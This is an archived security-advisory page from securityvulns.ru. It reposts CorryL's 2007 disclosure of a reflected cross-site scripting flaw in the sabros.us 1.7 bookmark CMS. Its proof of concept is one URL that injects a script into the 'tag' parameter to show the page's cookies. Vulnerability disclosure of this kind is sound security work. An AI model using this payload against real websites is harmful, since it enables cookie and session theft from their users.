Computer Security

Security Advisory: [x0n3-h4ck] sabros.us 1.7 XSS Exploit
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  SMF "index.
php?action=pm" Cross Site-Scripting

  Paypal Subscription Manager Multiple HTML Injections

  Login Manager Multiple HTML Injections

  a-forum  xss

From:CorryL <corrado.liotta_(at)_alice.it>
Date:20.01.2007
Subject:[x0n3-h4ck] sabros.us 1.7 XSS Exploit

-=[--------------------ADVISORY-------------------]=-
                                             
                       sabros.us 1.7    
                                              
 Author: CorryL    [corryl80@gmail.com]   
-=[-----------------------------------------------]=-


-=[+] Application:    sabros.us
-=[+] Version:        1.7
-=[+] Vendor's URL:   http://sourceforge.net/projects/sabrosus/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck        


..::[ Descriprion ]::..

sabros.us is a CMS to put your bookmarks online with folksonomy support;
just like del.icio.us, but the big diference is you will have
the complete control of the source code and written on PHP with MySQL
as backend we make it cross platform.


..::[ Proof Of Concept ]::..

http://remote-server/index.
php?tag=</title><script>alert(document.
cookie)</script>



About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server